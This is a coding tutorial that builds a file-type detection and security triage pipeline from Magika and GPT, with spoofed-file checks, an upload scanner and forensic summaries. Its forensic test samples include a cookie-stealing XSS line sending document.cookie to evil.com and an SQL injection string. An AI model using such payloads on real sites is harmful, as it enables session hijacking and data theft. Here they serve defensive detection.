
A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI


In this tutorial, we construct a workflow that combines Magika's deep-learning-based file type detection with OpenAI's language intelligence to create a practical and insightful analysis pipeline. We begin by setting up the required libraries, securely connecting to the OpenAI API, and initializing Magika to classify files directly from raw bytes rather than relying on filenames or extensions. As we move through the tutorial, we explore batch scanning, confidence modes, spoofed-file detection, forensic-style analysis, upload-pipeline risk scoring, and structured JSON reporting. At each stage, we use GPT to translate technical scan outputs into clear explanations, security insights, and executive-level summaries, allowing us to connect low-level byte detection with meaningful real-world interpretation.
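Before reaching for Magika itself, the core idea can be sketched with the standard library alone: an extension only *claims* a type, while the leading bytes *reveal* one. The signature table and `sniff` helper below are illustrative stand-ins for this sketch, not part of Magika:

```python
import mimetypes

# A few well-known magic-byte prefixes (illustrative subset).
MAGIC_SIGNATURES = {
    b"%PDF-":        "application/pdf",
    b"PK\x03\x04":   "application/zip",
    b"MZ":           "application/vnd.microsoft.portable-executable",
    b"\xff\xd8\xff": "image/jpeg",
}

def sniff(filename: str, head: bytes) -> dict:
    """Compare the extension's claimed type against the leading bytes."""
    claimed, _ = mimetypes.guess_type(filename)
    detected = next(
        (mime for sig, mime in MAGIC_SIGNATURES.items() if head.startswith(sig)),
        "unknown",
    )
    return {
        "claimed": claimed,
        "detected": detected,
        "mismatch": claimed is not None and detected != "unknown" and claimed != detected,
    }

# A PE executable renamed to .pdf is flagged immediately.
print(sniff("invoice.pdf", b"MZ\x90\x00"))
```

Magika goes far beyond such a hard-coded table, since a learned model also recognizes content (source code, CSV, configs) that has no magic bytes at all.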

!pip install magika openai -q


import os, io, json, zipfile, textwrap, hashlib, tempfile, getpass
from pathlib import Path
from collections import Counter
from magika import Magika
from magika.types import MagikaResult, PredictionMode
from openai import OpenAI


print("🔑 Enter your OpenAI API key (input is hidden):")
api_key = getpass.getpass("OpenAI API Key: ")
client  = OpenAI(api_key=api_key)


try:
    client.models.list()
    print("✅ OpenAI connected successfully\n")
except Exception as e:
    raise SystemExit(f"❌ OpenAI connection failed: {e}")


m = Magika()
print("✅ Magika loaded successfully\n")
print(f"   module version : {m.get_module_version()}")
print(f"   model name     : {m.get_model_name()}")
print(f"   output types   : {len(m.get_output_content_types())} supported labels\n")


def ask_gpt(system: str, user: str, model: str = "gpt-4o", max_tokens: int = 600) -> str:
    resp = client.chat.completions.create(
        model=model,
        max_tokens=max_tokens,
        messages=[
            {"role": "system", "content": system},
            {"role": "user",   "content": user},
        ],
    )
    return resp.choices[0].message.content.strip()


print("=" * 60)
print("SECTION 1 — Core API + GPT Plain-Language Explanation")
print("=" * 60)


samples = {
    "Python":     b'import os\ndef greet(name):\n    print(f"Hello, {name}")\n',
    "JavaScript": b'const fetch = require("node-fetch");\nasync function getData() { return await fetch("/api"); }',
    "CSV":        b'name,age,city\nAlice,30,NYC\nBob,25,LA\n',
    "JSON":       b'{"name": "Alice", "scores": [10, 20, 30], "active": true}',
    "Shell":      b'#!/bin/bash\necho "Hello"\nfor i in $(seq 1 5); do echo $i; done',
    "PDF magic":  b'%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n',
    "ZIP magic":  bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),
}


print(f"\n{'Label':<12} {'MIME Type':<30} {'Score':>6}")
print("-" * 52)
magika_labels = []
for name, raw in samples.items():
    res = m.identify_bytes(raw)
    magika_labels.append(res.output.label)
    print(f"{res.output.label:<12} {res.output.mime_type:<30} {res.score:>5.1%}")


explanation = ask_gpt(
    system="You are a concise ML engineer. Explain in 4–5 sentences.",
    user=(
        f"Magika is Google's AI file-type detector. It just identified these types from raw bytes: "
        f"{magika_labels}. Explain how a deep-learning model detects file types from "
        "just bytes, and why this beats relying on file extensions."
    ),
    max_tokens=250,
)
print(f"\n💬 GPT on how Magika works:\n{textwrap.fill(explanation, 72)}\n")


print("=" * 60)
print("SECTION 2 — Batch Identification + GPT Summary")
print("=" * 60)


tmp_dir = Path(tempfile.mkdtemp())
file_specs = {
    "code.py":     b"import sys\nprint(sys.version)\n",
    "style.css":   b"body { font-family: Arial; margin: 0; }\n",
    "data.json":   b'[{"id": 1, "val": "foo"}, {"id": 2, "val": "bar"}]',
    "script.sh":   b"#!/bin/sh\necho Hello World\n",
    "doc.html":    b"<html><body><p>Hello</p></body></html>",
    "config.yaml": b"server:\n  host: localhost\n  port: 8080\n",
    "query.sql":   b"CREATE TABLE t (id INT PRIMARY KEY, name TEXT);\n",
    "notes.md":    b"# Heading\n\n- item one\n- item two\n",
}


paths = []
for fname, content in file_specs.items():
    p = tmp_dir / fname
    p.write_bytes(content)
    paths.append(p)


results       = m.identify_paths(paths)
batch_summary = [
    {"file": p.name, "label": r.output.label,
     "group": r.output.group, "score": f"{r.score:.1%}"}
    for p, r in zip(paths, results)
]


print(f"\n{'File':<18} {'Label':<14} {'Group':<12} {'Score':>6}")
print("-" * 54)
for row in batch_summary:
    print(f"{row['file']:<18} {row['label']:<14} {row['group']:<12} {row['score']:>6}")


gpt_summary = ask_gpt(
    system="You are a DevSecOps expert. Be concise and practical.",
    user=(
        f"A file upload scanner detected these file types in a batch: "
        f"{json.dumps(batch_summary)}. "
        "In 3–4 sentences, summarise what kind of project this looks like "
        "and flag any file types that might warrant extra scrutiny."
    ),
    max_tokens=220,
)
print(f"\n💬 GPT project assessment:\n{textwrap.fill(gpt_summary, 72)}\n")

We install the required libraries, connect Magika and OpenAI, and set up the core helper function that lets us send prompts for analysis. We begin by testing Magika on various raw byte samples to see how it identifies file types without relying on file extensions. We also create a batch of sample files and use GPT to summarize what kind of project or codebase the detected file collection appears to represent.
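The per-file rows produced above also aggregate naturally into a per-group overview. A small sketch of that aggregation, using a `Row` stand-in tuple (an assumption for this sketch, so it runs without Magika installed) in place of real `(path, MagikaResult)` pairs:

```python
from collections import Counter
from typing import NamedTuple

class Row(NamedTuple):
    # Stand-in for one scanned file: name plus Magika's label and group.
    file: str
    label: str
    group: str

def summarize_groups(rows):
    """Count scanned files per detected group — a quick repo overview."""
    return dict(Counter(r.group for r in rows))

rows = [Row("code.py", "python", "code"),
        Row("style.css", "css", "code"),
        Row("notes.md", "markdown", "text")]
print(summarize_groups(rows))  # -> {'code': 2, 'text': 1}
```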

print("=" * 60)
print("SECTION 3 — Prediction Modes + GPT Mode-Selection Guidance")
print("=" * 60)


ambiguous    = b"Hello, world. This is a short text."
mode_results = {}


for mode in [PredictionMode.HIGH_CONFIDENCE,
             PredictionMode.MEDIUM_CONFIDENCE,
             PredictionMode.BEST_GUESS]:
    m_mode = Magika(prediction_mode=mode)
    res    = m_mode.identify_bytes(ambiguous)
    mode_results[mode.name] = {
        "label": res.output.label,
        "score": f"{res.score:.1%}",
    }
    print(f"  {mode.name:<22}  label={res.output.label:<20} score={res.score:.1%}")


guidance = ask_gpt(
    system="You are a security engineer. Be concise (3 bullet points).",
    user=(
        f"Magika's three confidence modes returned: {json.dumps(mode_results)} "
        "for the same ambiguous text snippet. Give one practical use-case where each mode "
        "(HIGH_CONFIDENCE, MEDIUM_CONFIDENCE, BEST_GUESS) is the right choice."
    ),
    max_tokens=220,
)
print(f"\n💬 GPT on when to use each mode:\n{guidance}\n")


print("=" * 60)
print("SECTION 4 — MagikaResult Anatomy + GPT Field Explanation")
print("=" * 60)


code_snippet = b"""
#!/usr/bin/env python3
from typing import List


def fibonacci(n: int) -> List[int]:
    a, b = 0, 1
    result = []
    for _ in range(n):
        result.append(a)
        a, b = b, a + b
    return result
"""


res = m.identify_bytes(code_snippet)
result_dict = {
    "output.label":       res.output.label,
    "output.description": res.output.description,
    "output.mime_type":   res.output.mime_type,
    "output.group":       res.output.group,
    "output.extensions":  res.output.extensions,
    "output.is_text":     res.output.is_text,
    "dl.label":           res.dl.label,
    "dl.description":     res.dl.description,
    "dl.mime_type":       res.dl.mime_type,
    "score":              round(res.score, 4),
}
for k, v in result_dict.items():
    print(f"  {k:<28} = {v}")


field_explanation = ask_gpt(
    system="You are a concise ML engineer.",
    user=(
        f"Magika returned this result object for a Python file: {json.dumps(result_dict)}. "
        "In 4 sentences, explain the difference between the `dl.*` fields and `output.*` fields, "
        "and why dl.label and output.label might differ even though there is only one score."
    ),
    max_tokens=220,
)
print(f"\n💬 GPT explains dl vs output:\n{textwrap.fill(field_explanation, 72)}\n")


print("=" * 60)
print("SECTION 5 — Spoofed Files + GPT Threat Assessment")
print("=" * 60)


spoofed_files = {
    "invoice.pdf":  b'#!/usr/bin/env python3\nprint("I am Python, not a PDF!")\n',
    "photo.jpg":    b'<html><body>This is HTML masquerading as JPEG</body></html>',
    "data.csv":     bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),
    "readme.txt":   b'%PDF-1.4\n1 0 obj\n<</Type /Catalog>>\nendobj\n',
    "legit.py":     b'import sys\nprint(sys.argv)\n',
}
# Label each extension claims to be (Magika label names).
ext_to_expected = {"pdf": "pdf", "jpg": "jpeg", "csv": "csv", "txt": "txt", "py": "python"}


threats = []
print(f"\n{'Filename':<18} {'Expected':^10} {'Detected':^14} {'Match':^6}  {'Score':>6}")
print("-" * 62)
for fname, content in spoofed_files.items():
    ext      = fname.rsplit(".", 1)[-1]
    expected = ext_to_expected.get(ext, ext)
    res      = m.identify_bytes(content)
    detected = res.output.label
    match    = "✅" if detected == expected else "🚨"
    if detected != expected:
        threats.append({"file": fname, "claimed_ext": ext, "actual_type": detected})
    print(f"{fname:<18} {expected:^10} {detected:^14} {match:^6}  {res.score:>5.1%}")


threat_report = ask_gpt(
    system="You are a SOC analyst. Be specific and concise.",
    user=(
        f"Magika detected these extension-spoofed files: {json.dumps(threats)}. "
        "For each mismatch, describe in one sentence what the likely threat vector is "
        "and what action a security team should take."
    ),
    max_tokens=300,
)
print(f"\n💬 GPT threat assessment:\n{threat_report}\n")

We explore Magika's prediction modes and examine how different confidence settings behave when the input is ambiguous. We then inspect the structure of the Magika result object in detail to understand the distinction between processed output fields and raw model fields. After that, we test spoofed files with misleading extensions and use GPT to explain the likely threat vectors and recommended security responses.
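Conceptually, the prediction modes behave like a thresholding step applied to the raw model prediction. The cutoff values below are illustrative placeholders, not Magika's actual thresholds; the point is only that the same raw label and score can resolve to different final labels depending on the mode:

```python
# Illustrative sketch of confidence-mode thresholding — NOT Magika's real
# threshold values. The raw model label survives only if its score clears
# the cutoff for the chosen mode; otherwise a generic fallback is used.
THRESHOLDS = {
    "HIGH_CONFIDENCE":   0.99,  # assumed value, for illustration only
    "MEDIUM_CONFIDENCE": 0.50,  # assumed value, for illustration only
    "BEST_GUESS":        0.00,  # always keep the raw prediction
}

def final_label(raw_label: str, score: float, mode: str, fallback: str = "txt") -> str:
    """Keep the raw label if the score clears the mode's threshold."""
    return raw_label if score >= THRESHOLDS[mode] else fallback

# The same 70%-confident "python" guess resolves differently per mode:
for mode in THRESHOLDS:
    print(f"{mode:<18} -> {final_label('python', 0.70, mode)}")
```

This is also exactly why `dl.label` and `output.label` can differ in Section 4: the former is the raw prediction, the latter is what survives the mode's threshold.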

print("=" * 60)
print("SECTION 6 — Corpus Distribution + GPT Insight")
print("=" * 60)


corpus = [
    b"SELECT * FROM orders WHERE status='open';",
    b"<!DOCTYPE html><html><body>page</body></html>",
    b"import numpy as np\nprint(np.zeros(10))",
    b"body { color: red; }",
    b'{"key": "value"}',
    b"name,score\nAlice,95\nBob,87",
    b"# Title\n## Section\n- bullet",
    b"echo hello\nls -la",
    b"const x = () => 42;",
    b'package main\nimport "fmt"\nfunc main() { fmt.Println("Go") }',
    b"public class Hello { public static void main(String[] a) {} }",
    b'fn main() { println!("Rust!"); }',
    b"#!/usr/bin/env ruby\nputs 'hello'",
    b"<?php echo 'Hello World'; ?>",
    b"[section]\nkey=value\nanother=thing",
    b"FROM python:3.11\nCOPY . /app\nCMD python app.py",
    b"apiVersion: v1\nkind: Pod\nmetadata:\n  name: test",
]


all_results  = [m.identify_bytes(b) for b in corpus]
group_counts = Counter(r.output.group for r in all_results)
label_counts = Counter(r.output.label for r in all_results)


print("\nBy GROUP:")
for grp, cnt in sorted(group_counts.items(), key=lambda x: -x[1]):
    print(f"  {grp:<12} {'█' * cnt} ({cnt})")


print("\nBy LABEL:")
for lbl, cnt in sorted(label_counts.items(), key=lambda x: -x[1]):
    print(f"  {lbl:<18} {cnt}")


distribution = {"groups": dict(group_counts), "labels": dict(label_counts)}
insight = ask_gpt(
    system="You are a staff engineer reviewing a code repository. Be concise.",
    user=(
        f"A file scanner found this type distribution: {json.dumps(distribution)}. "
        "In 3–4 sentences, describe what kind of repository this is, "
        "and suggest one thing to watch out for from a maintainability perspective."
    ),
    max_tokens=220,
)
print(f"\n💬 GPT repository insight:\n{textwrap.fill(insight, 72)}\n")


print("=" * 60)
print("SECTION 7 — Minimum Bytes Needed + GPT Explanation")
print("=" * 60)


full_python = b"#!/usr/bin/env python3\nimport os, sys\nprint('hello')\n" * 10
probe_data  = {}
print(f"\nFull content size: {len(full_python)} bytes")
print(f"\n{'Prefix (bytes)':<18} {'Label':<14} {'Score':>6}")
print("-" * 40)
for size in [4, 8, 16, 32, 64, 128, 256, 512]:
    res = m.identify_bytes(full_python[:size])
    probe_data[str(size)] = {"label": res.output.label, "score": round(res.score, 3)}
    print(f"  first {size:<10}  {res.output.label:<14} {res.score:>5.1%}")


probe_insight = ask_gpt(
    system="You are a concise ML engineer.",
    user=(
        f"Magika's identification of a Python file at different byte-prefix lengths: "
        f"{json.dumps(probe_data)}. "
        "In 3 sentences, explain why a model can identify file types from so few bytes, "
        "and what architectural choices make this possible."
    ),
    max_tokens=200,
)
print(f"\n💬 GPT on byte-level detection:\n{textwrap.fill(probe_insight, 72)}\n")

We analyze a mixed corpus of code and configuration content to understand the distribution of detected file groups and labels across a repository-like dataset. We use these results to let GPT infer the repository's nature and highlight maintainability concerns based on the detected composition. We also probe how many bytes Magika needs for identification and examine how early byte-level patterns can still reveal file identity with useful confidence.
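The prefix sweep above can be generalized into a small helper that reports the shortest probed prefix whose label agrees with the full content. The `crude_detect` stand-in below is a deliberately naive detector, an assumption made only so the sketch runs without Magika; `m.identify_bytes` (wrapped to return `res.output.label`) could be passed as the `detect` callable instead:

```python
def minimal_prefix(data: bytes, detect, probe_sizes=(4, 8, 16, 32, 64, 128, 256, 512)) -> int:
    """Smallest probed prefix whose detected label matches the full content's."""
    full_label = detect(data)
    for n in probe_sizes:
        if detect(data[:n]) == full_label:
            return n
    return len(data)  # no probed prefix agreed; the whole content was needed

def crude_detect(b: bytes) -> str:
    # Naive stand-in detector (for this sketch only, not Magika's logic).
    if b.startswith(b"#!"):
        return "script"
    if b.lstrip()[:1] in (b"{", b"["):
        return "json"
    return "text"

# A shebang gives the game away within the first 4 bytes.
print(minimal_prefix(b"#!/usr/bin/env python3\nprint('hi')\n", crude_detect))  # -> 4
```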

print("=" * 60)
print("SECTION 8 — Upload Scanner Pipeline + GPT Risk Scoring")
print("=" * 60)


upload_dir = Path(tempfile.mkdtemp()) / "uploads"
upload_dir.mkdir()
uploads = {
    "report.pdf":      b'%PDF-1.4\n1 0 obj\n<</Type /Catalog>>\nendobj\n',
    "data_export.csv": b"id,name,email\n1,Alice,[email protected]\n2,Bob,[email protected]",
    "setup.sh":        b"#!/bin/bash\napt-get update && apt-get install -y curl\n",
    "config.json":     b'{"debug": true, "workers": 4}',
    "malware.exe":     bytes([0x4D, 0x5A]) + bytes(100),
    "index.html":      b"<html><body>Hello</body></html>",
    "main.py":         b"from flask import Flask\napp = Flask(__name__)\n",
    "suspicious.txt":  bytes([0x4D, 0x5A]) + bytes(50),
}


for fname, content in uploads.items():
    (upload_dir / fname).write_bytes(content)


all_paths     = list(upload_dir.iterdir())
batch_results = m.identify_paths(all_paths)


BLOCKED_LABELS = {"pe", "elf", "macho"}
ext_map        = {"pdf": "pdf", "csv": "csv", "sh": "shell", "json": "json",
                  "exe": "pe", "html": "html", "py": "python", "txt": "txt"}


scan_results = []
print(f"\n{'File':<22} {'Label':<16} {'Score':>6}  {'Status'}")
print("-" * 65)
for path, res in zip(all_paths, batch_results):
    o        = res.output
    ext      = path.suffix.lstrip(".")
    expected = ext_map.get(ext, "")
    mismatch = expected and (o.label != expected)


    if o.label in BLOCKED_LABELS:
        status = "🚫 BLOCKED"
    elif mismatch:
        status = f"⚠  MISMATCH (ext:{expected})"
    else:
        status = "✅ OK"


    scan_results.append({
        "file":   path.name,
        "label":  o.label,
        "group":  o.group,
        "score":  round(res.score, 3),
        "status": status.replace("🚫 ", "").replace("⚠  ", "").replace("✅ ", ""),
    })
    print(f"{path.name:<22} {o.label:<16} {res.score:>5.1%}  {status}")


risk_report = ask_gpt(
    system="You are a senior security analyst. Be structured and actionable.",
    user=(
        f"A file upload scanner produced these results: {json.dumps(scan_results)}. "
        "Provide a 5-sentence risk summary: identify the highest-risk files, "
        "explain why they are risky, and give concrete remediation steps."
    ),
    max_tokens=350,
)
print(f"\n💬 GPT risk report:\n{risk_report}\n")


print("=" * 60)
print("SECTION 9 — Forensics + GPT IOC Narrative")
print("=" * 60)


forensic_samples = [
    ("sample_A", b"import re\npattern = re.compile(r'\\d+')\n"),
    ("sample_B", b'{"attack": "sqli", "payload": "1 OR 1=1"}'),
    ("sample_C", bytes([0xFF, 0xD8, 0xFF, 0xE0]) + b"JFIF" + bytes(50)),
    ("sample_D", b"<script>doc.location='http://evil.com?c='+doc.cookie</script>"),
    ("sample_E", b"MZ" + bytes(100)),
]


ioc_data = []
print(f"\n{'Name':<12} {'SHA256':<18} {'Label':<14} {'MIME':<28} {'is_text'}")
print("-" * 80)
for name, content in forensic_samples:
    sha = hashlib.sha256(content).hexdigest()[:16]
    res = m.identify_bytes(content)
    o   = res.output
    ioc_data.append({
        "id":            name,
        "sha256_prefix": sha,
        "label":         o.label,
        "mime":          o.mime_type,
        "is_text":       o.is_text,
    })
    print(f"{name:<12} {sha:<18} {o.label:<14} {o.mime_type:<28} {o.is_text}")


ioc_narrative = ask_gpt(
    system="You are a threat intelligence analyst writing an incident report.",
    user=(
        f"During a forensic investigation, these file samples were recovered: "
        f"{json.dumps(ioc_data)}. "
        "Write a concise 5-sentence Indicators of Compromise (IOC) narrative "
        "describing the likely attack chain and what each sample represents."
    ),
    max_tokens=350,
)
print(f"\n💬 GPT IOC narrative:\n{ioc_narrative}\n")

We simulate a real upload-scanning pipeline that classifies files, compares detected types against expected extensions, and decides whether each file should be allowed, flagged, or blocked. We then move into a forensic scenario in which we generate SHA-256 prefixes, inspect MIME types, and create structured indicators from recovered file samples. Throughout both parts, we use GPT to convert technical scan results into practical risk summaries and concise IOC-style incident narratives.
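The allow/flag/block decision inside the scan loop boils down to a pure function, which is much easier to unit-test than the full pipeline. A sketch of that refactoring, reusing the same blocked-label set and extension map as the upload scanner (the `triage` name and return strings are our own choices for this sketch):

```python
BLOCKED_LABELS = {"pe", "elf", "macho"}
EXT_MAP = {"pdf": "pdf", "csv": "csv", "sh": "shell", "json": "json",
           "exe": "pe", "html": "html", "py": "python", "txt": "txt"}

def triage(filename: str, detected_label: str) -> str:
    """Return 'BLOCKED', 'MISMATCH', or 'OK' for one scanned upload."""
    if detected_label in BLOCKED_LABELS:
        return "BLOCKED"      # native executables are never allowed, whatever the name
    ext = filename.rsplit(".", 1)[-1].lower()
    expected = EXT_MAP.get(ext, "")
    if expected and detected_label != expected:
        return "MISMATCH"     # the extension lies about the content
    return "OK"

print(triage("evil.exe", "pe"),
      triage("spoof.pdf", "python"),
      triage("main.py", "python"))
```

Note the check order: the blocked-label test runs first, so a PE renamed to `.txt` is blocked outright rather than merely flagged as a mismatch.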

print("=" * 60)
print("SECTION 10 — JSON Report + GPT Executive Summary")
print("=" * 60)


export_samples = {
    "api.py":      b"from fastapi import FastAPI\napp = FastAPI()\n@app.get('/')\ndef root(): return {}\n",
    "schema.sql":  b"CREATE TABLE users (id SERIAL PRIMARY KEY, email TEXT UNIQUE);\n",
    "deploy.yaml": b"name: deploy\non: push\njobs:\n  build:\n    runs-on: ubuntu-latest\n",
    "evil.exe":    bytes([0x4D, 0x5A]) + bytes(100),
    "spoof.pdf":   b'#!/usr/bin/env python3\nprint("not a pdf")\n',
}


report = []
for name, content in export_samples.items():
    res = m.identify_bytes(content)
    o   = res.output
    report.append({
        "filename":    name,
        "label":       o.label,
        "description": o.description,
        "mime_type":   o.mime_type,
        "group":       o.group,
        "is_text":     o.is_text,
        "dl_label":    res.dl.label,
        "score":       round(res.score, 4),
    })


print(json.dumps(report, indent=2))


exec_summary = ask_gpt(
    system="You are a CISO writing a two-paragraph executive summary. Be clear and non-technical.",
    user=(
        f"An AI file scanner analysed these files: {json.dumps(report)}. "
        "Write a two-paragraph executive summary: paragraph 1 covers what was found "
        "and the overall risk posture; paragraph 2 gives recommended next steps."
    ),
    max_tokens=400,
)
print(f"\n💬 GPT executive summary:\n{exec_summary}\n")


out_path = "/tmp/magika_openai_report.json"
with open(out_path, "w") as f:
   json.dump({"scan_results": report, "executive_summary": exec_summary}, f, indent=2)
print(f"💾 Full report saved to: {out_path}")


print("\n" + "=" * 60)
print("✅ Magika + OpenAI Tutorial Complete!")
print("=" * 60)
print("""
All fixes applied (magika 1.0.2):
 ✗ from magika import MagikaConfig   → removed (never existed)
 ✗ MagikaConfig(prediction_mode=m)   → Magika(prediction_mode=m)
 ✗ m.get_model_version()             → m.get_model_name()
 ✗ res.output_score                  → res.score
 ✗ res.dl_score / res.dl.score       → res.score  (score only lives on MagikaResult)


MagikaResult field map (1.0.2):
 res.score           ← the one and only confidence score
 res.output.label    ← final label after threshold logic   (use this)
 res.dl.label        ← raw model label before thresholding (for debugging)
 res.output.*        ← description, mime_type, group, extensions, is_text
 res.dl.*            ← same fields but from the raw model output


Sections:
 §1   Core API (bytes/path/stream)         + GPT explains Magika's ML approach
 §2   Batch scanning                       + GPT project-type assessment
 §3   Confidence modes via constructor arg + GPT when-to-use guidance
 §4   MagikaResult anatomy                 + GPT explains dl vs output fields
 §5   Spoofed-file detection               + GPT threat assessment per mismatch
 §6   Corpus distribution                  + GPT repository insight
 §7   Byte-prefix probing                  + GPT explains byte-level detection
 §8   Upload pipeline (allow/block/flag)   + GPT risk report
 §9   Forensics hash+type fingerprinting   + GPT IOC narrative
§10   JSON report export                   + GPT CISO executive summary
""")

We build a structured JSON report from several analyzed files and capture key metadata, including labels, MIME types, text status, and model confidence scores. We then use GPT to produce a non-technical executive summary that explains the overall findings, risk posture, and recommended next steps in a way that leadership can understand. Finally, we export the results to a JSON file and print a completion summary that reinforces the Magika 1.0.2 fixes and the full scope of the tutorial.
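Once saved, the JSON report becomes an interface for downstream tooling. A sketch of a consumer that reloads the file and pulls out high-risk rows — the stand-in report, path, and label filter here mirror the tutorial's choices but are otherwise assumptions for this example:

```python
import json
import os
import tempfile

# Minimal stand-in report matching the schema produced above.
report_doc = {
    "scan_results": [
        {"filename": "api.py",   "label": "python", "score": 0.99},
        {"filename": "evil.exe", "label": "pe",     "score": 0.98},
    ],
    "executive_summary": "One executable detected among source files.",
}

path = os.path.join(tempfile.gettempdir(), "magika_openai_report_demo.json")
with open(path, "w") as f:
    json.dump(report_doc, f, indent=2)

# Downstream consumer: reload the report and filter for blocked labels.
with open(path) as f:
    loaded = json.load(f)

high_risk = [r["filename"] for r in loaded["scan_results"]
             if r["label"] in {"pe", "elf", "macho"}]
print(high_risk)  # -> ['evil.exe']
```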

In conclusion, we saw how Magika and OpenAI work together to form a powerful AI-assisted file analysis system that is both technically robust and easy to understand. We use Magika to identify true file types, detect mismatches, inspect suspicious content, and analyze repositories or uploads at scale. At the same time, GPT helps us explain results, assess risks, and generate concise narratives for different audiences. This combination provides a workflow that is useful for developers and researchers, as well as for security teams, forensic analysts, and technical decision-makers who need fast, accurate insight from file data. Overall, we create a practical end-to-end pipeline that shows how modern AI can improve file inspection, security triage, and automated reporting in a highly accessible Colab environment.


Check out the Full Codes with Notebook here.


The post A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI appeared first on MarkTechPost.
